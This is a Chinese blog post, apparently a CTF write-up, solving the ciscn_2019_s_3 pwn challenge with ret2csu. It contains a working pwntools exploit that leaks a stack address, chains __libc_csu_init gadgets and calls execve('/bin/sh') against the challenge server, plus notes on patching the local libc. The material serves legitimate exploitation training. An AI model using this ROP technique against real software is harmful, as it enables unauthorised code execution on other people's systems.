<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 7.0.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"example.com","root":"/","scheme":"Gemini","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>

  <meta name="description" content="关于ret2csu的一道题">
<meta property="og:type" content="article">
<meta property="og:title" content="关于ret2csu的一道题">
<meta property="og:url" content="http://example.com/2024/07/10/%E5%85%B3%E4%BA%8Eret2csu%E7%9A%84%E4%B8%80%E9%81%93%E9%A2%98/index.html">
<meta property="og:site_name" content="Qwen&#39;s blog">
<meta property="og:description" content="关于ret2csu的一道题">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://raw.githubusercontent.com/Qwen11/picture/main/202407101108593.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Qwen11/picture/main/202407101109280.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Qwen11/picture/main/202407101109881.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Qwen11/picture/main/202407101110328.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Qwen11/picture/main/202407101111199.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Qwen11/picture/main/202407101111960.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Qwen11/picture/main/202407101112897.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Qwen11/picture/main/202407101112143.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Qwen11/picture/main/202407101112790.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Qwen11/picture/main/202407101113922.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Qwen11/picture/main/202407101113867.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Qwen11/picture/main/202407101114720.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Qwen11/picture/main/202407101114715.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Qwen11/picture/main/202407101114024.png">
<meta property="article:published_time" content="2024-07-10T03:08:24.000Z">
<meta property="article:modified_time" content="2025-02-23T10:03:26.645Z">
<meta property="article:author" content="Qwen">
<meta property="article:tag" content="pwn">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://raw.githubusercontent.com/Qwen11/picture/main/202407101108593.png">

<link rel="canonical" href="http://example.com/2024/07/10/%E5%85%B3%E4%BA%8Eret2csu%E7%9A%84%E4%B8%80%E9%81%93%E9%A2%98/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>关于ret2csu的一道题 | Qwen's blog</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">Qwen's blog</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
  </ul>
</nav>




</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
   <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://example.com/2024/07/10/%E5%85%B3%E4%BA%8Eret2csu%E7%9A%84%E4%B8%80%E9%81%93%E9%A2%98/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar_1.jpg">
      <meta itemprop="name" content="Qwen">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Qwen's blog">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          关于ret2csu的一道题
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2024-07-10 11:08:24" itemprop="dateCreated datePublished" datetime="2024-07-10T11:08:24+08:00">2024-07-10</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2025-02-23 18:03:26" itemprop="dateModified" datetime="2025-02-23T18:03:26+08:00">2025-02-23</time>
              </span>

          
            <span class="post-meta-item" title="阅读次数" id="busuanzi_container_page_pv" style="display: none;">
              <span class="post-meta-item-icon">
                <i class="fa fa-eye"></i>
              </span>
              <span class="post-meta-item-text">阅读次数：</span>
              <span id="busuanzi_value_page_pv"></span>
            </span>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <p>关于<code>ret2csu</code>的一道题</p>
<span id="more"></span>

<p><code>BUU</code>：<code>ciscn_2019_s_3</code></p>
<h2 id="思路"><a href="#思路" class="headerlink" title="思路"></a>思路</h2><p>检查保护，开了<code>NX</code>保护</p>
<p><img src="https://raw.githubusercontent.com/Qwen11/picture/main/202407101108593.png" alt="image-20240223192404259"></p>
<p>源码：</p>
<figure class="highlight c"><table><tr><td class="code"><pre><span class="line"><span class="type">signed</span> __int64 <span class="title function_">vuln</span><span class="params">()</span></span><br><span class="line">&#123;</span><br><span class="line">  <span class="type">signed</span> __int64 v0; <span class="comment">// rax</span></span><br><span class="line">  <span class="type">char</span> buf[<span class="number">16</span>]; <span class="comment">// [rsp+0h] [rbp-10h] BYREF</span></span><br><span class="line"></span><br><span class="line">  v0 = sys_read(<span class="number">0</span>, buf, <span class="number">0x400</span>uLL);</span><br><span class="line">  <span class="keyword">return</span> sys_write(<span class="number">1u</span>, buf, <span class="number">0x30</span>uLL);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>​	程序中有两个系统调用，<code>read</code>可栈溢出，程序中没有后门函数。但是我们看到了下面这个，<code>3bh</code>是<code>64</code>位程序<code>execve</code>的系统调用号，程序中有系统调用则肯定有<code>syscall</code>即我们可以利用<code>gadgets</code>布置<code>execve</code>的参数，然后<code>syscall</code>获得<code>shell</code>。</p>
<p><img src="https://raw.githubusercontent.com/Qwen11/picture/main/202407101109280.png" alt="image-20240223193124425"></p>
<p>​	系统调用<code>execve</code>，我们必须要知道<code>/bin/sh</code>的地址。本题中，<code>buf</code>的长度为<code>16</code>个字节，而<code>write</code>打印<code>0x30</code>个字节，又因为<code>buf</code>在栈上，所以<code>buf</code>下面的一些栈中的数据也会被打印出来。</p>
<p>​	我们填满<code>buf</code>的<code>16</code>个字节，然后发送<code>vuln</code>函数的第一个指令的地址，执行流会重新执行一遍<code>vuln</code>函数。发送<code>payload = b&#39;/bin/sh\x00&#39;+b&#39;a&#39;*8+p64(vuln_addr)</code>，然后看栈中的内容，其中<code>0x7ffd3e0cdce8</code>是栈地址同时也能被泄漏。</p>
<p><img src="https://raw.githubusercontent.com/Qwen11/picture/main/202407101109881.png" alt="image-20240223220610682"></p>
<p><code>payload</code>如下：</p>
<figure class="highlight python"><table><tr><td class="code"><pre><span class="line">vuln_addr = <span class="number">0x4004ed</span></span><br><span class="line">payload = <span class="string">b&#x27;/bin/sh\x00&#x27;</span>+<span class="string">b&#x27;a&#x27;</span>*<span class="number">8</span>+p64(vuln_addr)</span><br><span class="line">p.sendline(payload)</span><br><span class="line">p.recv(<span class="number">0x20</span>)</span><br><span class="line">stack_02_content = u64(p.recv(<span class="number">8</span>))</span><br><span class="line"><span class="built_in">print</span>(<span class="string">&#x27;stack_02_content  -----&gt; &#x27;</span>,<span class="built_in">hex</span>(stack_02_content))</span><br><span class="line">binsh_addr = stack_02_content-<span class="number">0x148</span></span><br><span class="line"><span class="built_in">print</span>(<span class="string">&#x27;binsh_addr  -----&gt; &#x27;</span>,<span class="built_in">hex</span>(binsh_addr))</span><br></pre></td></tr></table></figure>

<p>​	接下来就是传参，不过我们没有直接找到<code>rdx</code>相关的<code>gadget</code>地址，好吧，其实这就是道关于<code>ret2csu</code>类型的题。</p>
<img src="https://raw.githubusercontent.com/Qwen11/picture/main/202407101110328.png" alt="image-20240710111035299" style="zoom:80%;" />

<img src="https://raw.githubusercontent.com/Qwen11/picture/main/202407101111199.png" alt="image-20240710111108172" style="zoom:80%;" />

<p>​	下面是<code>csu</code>片段，我们就是要利用这两个片段，对寄存器进行各种操作，最后使<code>rdx</code>中的值为<code>0</code>（<code>execve</code>的第<code>3</code>个参数）。</p>
<p><img src="https://raw.githubusercontent.com/Qwen11/picture/main/202407101111960.png" alt="image-20240223193956921"></p>
<p>​	<code>csu</code>②都是一些<code>pop</code>，重要的是怎么绕过<code>csu</code>①，首先我们要弄懂<code>csu</code>①中的汇编代码是什么意思。其中，<code>call</code>指令是调用函数，这里的<code>[]</code>是间接寻址，<code>call  [r12+rbx*8]</code>这个指令的意思是调用一个函数，这个函数在哪，这个函数的地址在<code>r12+rbx*8</code>这个地址里装着。也就是说，如果<code>r12</code>和<code>rbx</code>的值分别为<code>0x123456</code>和<code>0</code>，<code>0x123456</code>又指向<code>0x400123</code>这个地址，那么我们要调用的函数的地址不是<code>0x123456</code>而是<code>0x400123</code>。</p>
<p>​	<code>cmp</code>指令用于比较两个操作数的值，<code>cmp  rbx,rbp</code>指令的意思是比较<code>rbx</code>和<code>rbp</code>这两个寄存器的值。如果<code>rbx</code>和<code>rbp</code>的值不相等，那么<code>jnz</code>会跳转到相应的地址执行，反之执行流继续执行下一条指令。</p>
<p><code>payload</code>如下：</p>
<figure class="highlight python"><table><tr><td class="code"><pre><span class="line">csu1_addr = <span class="number">0x400580</span></span><br><span class="line">csu2_addr = <span class="number">0x40059a</span></span><br><span class="line">term_proc_lastone_addr = <span class="number">0x600e50</span></span><br><span class="line"></span><br><span class="line">payload = p64(csu2_addr)+p64(<span class="number">0</span>)+p64(<span class="number">1</span>)+p64(term_proc_lastone_addr)+p64(<span class="number">0</span>)+p64(<span class="number">0</span>)+p64(<span class="number">0</span>)</span><br><span class="line"><span class="comment">#                           rbx    rbp        r12                     r13   r14     r15</span></span><br><span class="line">payload += p64(csu1_addr)</span><br></pre></td></tr></table></figure>

<p>​	我们在<code>ida</code>中看到<code>term_proc</code>是一个空函数，其地址为<code>0x4005b4</code>，当然这个肯定不是我们想要的，我们想要的是哪个地址指向<code>0x4005b4</code>。</p>
<p><img src="https://raw.githubusercontent.com/Qwen11/picture/main/202407101112897.png" alt="image-20240223200400679"></p>
<p>在<code>gdb</code>中，我们利用<code>search -p 0x4005b4</code>这个命令看到<code>0x600e50</code>这个地址中装的是<code>0x4005b4</code>。</p>
<p><img src="https://raw.githubusercontent.com/Qwen11/picture/main/202407101112143.png" alt="image-20240223200329635"></p>
<p>​	一开始按照上面的<code>payload</code>发送一直打不通，调试的时候发现，调用完这个空函数后会<code>ret</code>到返回地址<code>0x40058d</code>也就是<code>csu</code>①中的<code>add     rbx, 1</code>指令，后面会影响栈的有<code>add   rsp,8</code>和<code>6</code>个<code>pop</code>指令，所以我们还需要再发送<code>7*8</code>个垃圾数据。</p>
<p><img src="https://raw.githubusercontent.com/Qwen11/picture/main/202407101112790.png" alt="image-20240224101044851"></p>
<p><img src="https://raw.githubusercontent.com/Qwen11/picture/main/202407101113922.png" alt="image-20240224101247650"></p>
<p>修改后<code>payload</code>如下：</p>
<figure class="highlight python"><table><tr><td class="code"><pre><span class="line">csu1_addr = <span class="number">0x400580</span></span><br><span class="line">csu2_addr = <span class="number">0x40059a</span></span><br><span class="line">term_proc_lastone_addr = <span class="number">0x600e50</span></span><br><span class="line">payload = p64(csu2_addr)+p64(<span class="number">0</span>)+p64(<span class="number">1</span>)+p64(term_proc_lastone_addr)+p64(<span class="number">0</span>)+p64(<span class="number">0</span>)+p64(<span class="number">0</span>)</span><br><span class="line">payload += p64(csu1_addr)+<span class="string">b&#x27;a&#x27;</span>*<span class="number">8</span>+p64(<span class="number">0</span>)*<span class="number">6</span></span><br><span class="line">pop_rdi_addr = <span class="number">0x4005a3</span></span><br><span class="line">syscall_addr = <span class="number">0x400501</span></span><br><span class="line">mov_rax_addr = <span class="number">0x4004e2</span></span><br><span class="line">payload += p64(mov_rax_addr)+p64(pop_rdi_addr)+p64(binsh_addr)+p64(syscall_addr)</span><br><span class="line">p.sendline(payload)</span><br></pre></td></tr></table></figure>

<h2 id="exp"><a href="#exp" class="headerlink" title="exp"></a><code>exp</code></h2><figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="keyword">from</span> tools <span class="keyword">import</span> *</span><br><span class="line"><span class="comment">#p = process(&#x27;./s3&#x27;)</span></span><br><span class="line">p = remote(<span class="string">&quot;node5.buuoj.cn&quot;</span>,<span class="number">28982</span>)</span><br><span class="line"><span class="comment">#debug(p)</span></span><br><span class="line"></span><br><span class="line">vuln_addr = <span class="number">0x4004ed</span></span><br><span class="line">payload = <span class="string">b&#x27;/bin/sh\x00&#x27;</span>+<span class="string">b&#x27;a&#x27;</span>*<span class="number">8</span>+p64(vuln_addr)</span><br><span class="line">p.sendline(payload)</span><br><span class="line">p.recv(<span class="number">0x20</span>)</span><br><span class="line">stack_02_content = u64(p.recv(<span class="number">8</span>))</span><br><span class="line"><span class="built_in">print</span>(<span class="string">&#x27;stack_02_content  -----&gt; &#x27;</span>,<span class="built_in">hex</span>(stack_02_content))</span><br><span class="line">binsh_addr = stack_02_content-<span class="number">0x118</span></span><br><span class="line"><span class="built_in">print</span>(<span class="string">&#x27;binsh_addr  -----&gt; &#x27;</span>,<span class="built_in">hex</span>(binsh_addr))</span><br><span class="line"></span><br><span class="line">payload = <span class="string">b&#x27;/bin/sh\x00&#x27;</span>+<span class="string">b&#x27;a&#x27;</span>*<span class="number">8</span></span><br><span class="line">csu1_addr = <span class="number">0x400580</span></span><br><span class="line">csu2_addr = <span class="number">0x40059a</span></span><br><span class="line">term_proc_lastone_addr = <span class="number">0x600e50</span></span><br><span class="line">payload += p64(csu2_addr)+p64(<span class="number">0</span>)+p64(<span class="number">1</span>)+p64(term_proc_lastone_addr)+p64(<span class="number">0</span>)+p64(<span class="number">0</span>)+p64(<span class="number">0</span>)</span><br><span class="line">payload += p64(csu1_addr)+<span class="string">b&#x27;a&#x27;</span>*<span class="number">8</span>+p64(<span class="number">0</span>)*<span class="number">6</span></span><br><span class="line"></span><br><span class="line">pop_rdi_addr = <span class="number">0x4005a3</span></span><br><span class="line">syscall_addr = <span class="number">0x400501</span></span><br><span class="line">mov_rax_addr = <span class="number">0x4004e2</span></span><br><span class="line">payload += p64(mov_rax_addr)+p64(pop_rdi_addr)+p64(binsh_addr)+p64(syscall_addr)</span><br><span class="line">p.sendline(payload)</span><br><span class="line"></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>

<p>拿到<code>flag</code></p>
<p><img src="https://raw.githubusercontent.com/Qwen11/picture/main/202407101113867.png" alt="image-20240122145901772"></p>
<h2 id="更换libc"><a href="#更换libc" class="headerlink" title="更换libc"></a>更换<code>libc</code></h2><p>​	本题中本地和远程的<code>libc</code>不一样，所以偏移量也不同，本题中本地的是<code>0x148</code>远程为<code>0x118</code>。我们可以利用<code>pathelf</code>和<code>glibc-all-in-one</code>更换本地依赖的<code>libc</code>。</p>
<p>​	首先用<code>strings ./libc-2.23.so | grep &quot;GNU&quot;</code>命令查看远程<code>libc</code>的<code>GLIBC</code>版本</p>
<p><img src="https://raw.githubusercontent.com/Qwen11/picture/main/202407101114720.png" alt="image-20240224000900918"></p>
<p>然后在<code>glibc-all-in-one</code>中找到对应的版本号，<code>64</code>位程序对应<code>amd64</code>，<code>32</code>位程序对应<code>i386</code></p>
<p><img src="https://raw.githubusercontent.com/Qwen11/picture/main/202407101114715.png" alt="image-20240224001212635"></p>
<p>执行<code>./download 2.23-0ubuntu11.3_amd64</code>，便会在<code>glibc-all-all-in-one</code>目录下的<code>libs</code>目录中生成一个新目录</p>
<p><img src="https://raw.githubusercontent.com/Qwen11/picture/main/202407101114024.png" alt="image-20240224001750545"></p>
<p>最后便可利用<code>patchelf</code>中<code>--set-interpreter </code>和<code>--add-needed</code>选项分别设置链接器和依赖的路径即可。</p>

    </div>

    
    
    

      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/pwn/" rel="tag"># pwn</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2024/07/01/BUU%E5%88%B7%E9%A2%98/ciscn_2019_sw_1/" rel="prev" title="ciscn_2019_sw_1">
      <i class="fa fa-chevron-left"></i> ciscn_2019_sw_1
    </a></div>
      <div class="post-nav-item">
    <a href="/2024/07/10/%E4%B8%80%E9%81%93%E5%85%B3%E4%BA%8E%E9%80%9A%E8%BF%87%E7%BA%BF%E7%A8%8B%E7%BB%95%E8%BF%87%E6%B2%99%E7%AE%B1%E7%9A%84%E9%A2%98/" rel="next" title="关于通过线程绕过沙箱的一道题">
      关于通过线程绕过沙箱的一道题 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%80%9D%E8%B7%AF"><span class="nav-number">1.</span> <span class="nav-text">思路</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#exp"><span class="nav-number">2.</span> <span class="nav-text">exp</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%9B%B4%E6%8D%A2libc"><span class="nav-number">3.</span> <span class="nav-text">更换libc</span></a></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="Qwen"
      src="/images/avatar_1.jpg">
  <p class="site-author-name" itemprop="name">Qwen</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">26</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">6</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">13</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2025</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Qwen</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Gemini</a> 强力驱动
  </div>




    <script async src="//dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js"></script>



        
<div class="busuanzi-count">
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
    <span class="post-meta-item" id="busuanzi_container_site_uv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-user"></i>
      </span>
      <span class="site-uv" title="总访客量">
        <span id="busuanzi_value_site_uv"></span>
      </span>
    </span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item" id="busuanzi_container_site_pv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-eye"></i>
      </span>
      <span class="site-pv" title="总访问量">
        <span id="busuanzi_value_site_pv"></span>
      </span>
    </span>
</div>








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  















  

  

</body>
</html>
